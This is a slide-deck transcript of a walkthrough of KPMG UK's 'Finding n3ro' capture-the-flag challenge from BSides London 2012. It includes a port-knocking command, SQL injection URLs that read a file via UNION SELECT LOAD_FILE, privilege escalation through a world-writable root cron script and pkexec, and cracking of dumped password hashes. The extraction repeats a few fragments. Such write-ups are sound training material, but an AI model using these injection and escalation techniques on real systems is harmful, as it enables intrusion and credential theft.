"finding n3ro" walk through
DESCRIPTION
KPMG UK's challenge "Finding n3ro" walkthroughTRANSCRIPT
Walkthrough of “Finding n3ro”
Copyright 0x776b7364 (c) 2012
Introduction
o “Finding n3ro” is a challenge created by KPMG UK for
Security B-Sides London 2012
Copyright 0x776b7364 (c) 2012
Part 1Website
<a href="mailto:[email protected]?subject=Challenge 7: Finding N3ro... ">mail to finding.n3ro</a>
Copyright 0x776b7364 (c) 2012
Part 1Email which I sent to [email protected]
I like to hang out on Google Groups…
Copyright 0x776b7364 (c) 2012
Part 1Google Groups search
Copyright 0x776b7364 (c) 2012
Part 1Result found!
Copyright 0x776b7364 (c) 2012
Part 1
http://groups.google.com/group/n3ro-tech-talk/msg/e8c3ed172eb21d2b
Random ASCII characters..?
Copyright 0x776b7364 (c) 2012
Part 1
Possibly Base64 encoded?
Copyright 0x776b7364 (c) 2012
Part 1Cleaning up the encoded string
Copyright 0x776b7364 (c) 2012
Part 1Converting from Base64 ASCII to binary
Copyright 0x776b7364 (c) 2012
Part 1Dumping the binary in hex form..
Copyright 0x776b7364 (c) 2012
Part 1Looks to be a MS Word document..
Copyright 0x776b7364 (c) 2012
Part 1Contents of said document
Copyright 0x776b7364 (c) 2012
Part 1Properties of said document
Part 2 of Finding N3ro
can be downloaded
here: http://finding-
n3ro.net/01efaa15a2bn3ro.net/01efaa15a2b
90d65fefa472cd00f6a4
f/N3rosVM.zip;
Copyright 0x776b7364 (c) 2012
Part 1Contents of zip file
Copyright 0x776b7364 (c) 2012
Part 1 (Solved)Contents of text file inside zip file.. And a pointer to Part 2
Copyright 0x776b7364 (c) 2012
Part 2
Copyright 0x776b7364 (c) 2012
Part 2
Copyright 0x776b7364 (c) 2012
Part 2Contents of yet another text file
Copyright 0x776b7364 (c) 2012
Port Knocking: An Introduction
o A method of externally opening ports by generating a
connection attempt on a set of prespecified closed ports
o Once a correct sequence is received, firewall rules are
dynamically modified to allow the host which sent the sequence dynamically modified to allow the host which sent the sequence
to connect over specific port(s)
o Primary purpose is to prevent an attacker from scanning a
system for potentially exploitable services by doing a port scan
Source: http://en.wikipedia.org/wiki/Port_knocking
Copyright 0x776b7364 (c) 2012
Part 2
• TCP ports Finger,NTP,HTTPS,DNS,RDP,FTP,Oracle
Listener,Kerberos,SSH,HTTP (and in that order too...)
Port knocking continued..
Finger 79
NTP 123
HTTPS 443HTTPS 443
DNS 53
RDP 3389
FTP 21
Oracle Listener 1521
Kerberos 88
SSH 22
HTTP 80
Copyright 0x776b7364 (c) 2012
Part 2Before knocking…
Copyright 0x776b7364 (c) 2012
Part 2knock.exe 192.168.56.101 79 123 443 53 3389 21 1521 88 22 80 -v
Copyright 0x776b7364 (c) 2012
Part 2 (Solved)An accessible webpage!
Copyright 0x776b7364 (c) 2012
Part 3SQL Injection
http://192.168.56.101/reshow.php?id=-1+or+1%3D1
All you need is /usr/share/mysql/n3ro.part4
Copyright 0x776b7364 (c) 2012
Part 3Testing UNION SELECT injection..
Copyright 0x776b7364 (c) 2012
Part 3Preparing the injection..
/usr/share/mysql/n3ro.part4 == 0x2f7573722f73686172652f6d7973716c2f6e33726f2e7061727434
Copyright 0x776b7364 (c) 2012
Part 3 (Solved)SQL Injection II
User: n3ro
http://192.168.56.101/reshow.php?id=-
1%20UNION%20SELECT%201,LOAD_FILE(0x2f7573722f73686172652f6d7973716c2f6e33726f2e706172
7434),3
User: n3ro
Password: KPMG_is_Hiring!
Copyright 0x776b7364 (c) 2012
Part 4
• Tried a lot of methods to get root, including
• Sudo
• n3ro not in /etc/sudoers
• Java atomic reference
Returned shell with n3ro privs
�
• Returned shell with n3ro privs
• PHP load_file/get_file_contents
• Permissions error
• Some other Linux kernel privilege escalation exploit
• Kernel has been updated
Copyright 0x776b7364 (c) 2012
Part 4 Method 1Peeking at crontab
Copyright 0x776b7364 (c) 2012
Part 4 Method 1Looking at /etc/1min.sh
In summary, 1min.sh is executed every one minute by crontab, is owned by
root, executed in the context of root, and is world-writable
Copyright 0x776b7364 (c) 2012
Part 4 Method 1Exploiting…
Copyright 0x776b7364 (c) 2012
Part 4 Method 1 (Solved)Wait a minute…
Copyright 0x776b7364 (c) 2012
Part 4 Method 2man pkexec
Copyright 0x776b7364 (c) 2012
Part 4 Method 2Using pkexec..
Copyright 0x776b7364 (c) 2012
Part 4 Method 2 (Solved)Using pkexec..
Copyright 0x776b7364 (c) 2012
Part 5
• ubuntu$ cd /Desktop/android-sdk-linux/tools
• ubuntu$ ./android avd
Android Virtual Device
Copyright 0x776b7364 (c) 2012
Part 5
• ubuntu$ ./adb devices
• ubuntu$ ./adb –s emulator-5554 shell
Connecting to AVD via terminal
Copyright 0x776b7364 (c) 2012
Part 5 Method 1
• Location of apk: /data/app/com.bsides.hackme-1.apk
• ubuntu$ ./adb pull /data/app/com.bsides.hackme-1.apk
Pulling the apk, and then converting apk to jar
Copyright 0x776b7364 (c) 2012
Part 5 Method 1 (Solved)Decompiled jar file
localAlertDialog.setMessage(“You can open /home/n3ro/21332esw.zip with
password: KPMG-Cyber-Security”);
Copyright 0x776b7364 (c) 2012
Part 5 Method 2
• droid# pwd
• droid# cd /data/data/com.bsides.hackme/databases
• droid# ls
• PasswordReaderdb
• droid# sqlite3 PasswordReaderdb
• sqlite3> .tables
• android_metadata userCred
Connecting to the database
• android_metadata userCred
• sqlite3> .dump userCred
Copyright 0x776b7364 (c) 2012
Part 5 Method 2Getting the hash
Copyright 0x776b7364 (c) 2012
Part 5 Method 2Googling the hash
md5(“password14”) = 8ee736784ce419bd16554ed5677ff35b
Copyright 0x776b7364 (c) 2012
Part 5 Method 2 (Solved)Connecting to the database
Copyright 0x776b7364 (c) 2012
Part 6Getting the instructions
Copyright 0x776b7364 (c) 2012
Part 6What is Volatility?
Copyright 0x776b7364 (c) 2012
Part 6Using Volatility to retrieve password hashes in memory dump file
n3ro:1011:90e0328fd51e9347f68b27ea95cd8bb2:7fa21bbd95d9f220b3f651cf8405a91b
Copyright 0x776b7364 (c) 2012
Part 6 (Solved)Rainbow tables was used to decrypt the hash
Password: KPMGisH1r1ng
Copyright 0x776b7364 (c) 2012
Part 7Using the password to decrypt the zip file..
Copyright 0x776b7364 (c) 2012
Part 7Our favourite packet analysis software
Copyright 0x776b7364 (c) 2012
Part 7Retrieving objects from packet data
Copyright 0x776b7364 (c) 2012
Part 7Retrieving objects from packet data
Copyright 0x776b7364 (c) 2012
Part 7Contents of file “p1”
Copyright 0x776b7364 (c) 2012
Part 7Contents of file “part7.c”
Copyright 0x776b7364 (c) 2012
Part 7Contents of file “part7.c”
Copyright 0x776b7364 (c) 2012
Part 7Directory listing of files
Being too lazy to install a C compiler…
Copyright 0x776b7364 (c) 2012
Part 7 (Solved)Contents of output joined file
Copyright 0x776b7364 (c) 2012
Part 8Files involved
Copyright 0x776b7364 (c) 2012
Part 8unlock.mp3
Copyright 0x776b7364 (c) 2012
Part 8unlock.mp3
Copyright 0x776b7364 (c) 2012
Part 8Deciphering morse code
Copyright 0x776b7364 (c) 2012
Part 8Last password?
THEFINAL
PASSWORD
TOUNLOCKTOUNLOCK
N3RO
IS
LKNH8732DWQ12SSW14FT
Copyright 0x776b7364 (c) 2012
Part 8Extracting our prize…
Copyright 0x776b7364 (c) 2012
Part 8 (Solved)Picture of n3ro (presumably)
Copyright 0x776b7364 (c) 2012
MiscellaneousMaintaining access
Copyright 0x776b7364 (c) 2012
MiscellaneousMaintaining access
Copyright 0x776b7364 (c) 2012
MiscellaneousSome interesting stuff
Copyright 0x776b7364 (c) 2012
MiscellaneousSome interesting stuff
Copyright 0x776b7364 (c) 2012
MiscellaneousSome interesting stuff
Copyright 0x776b7364 (c) 2012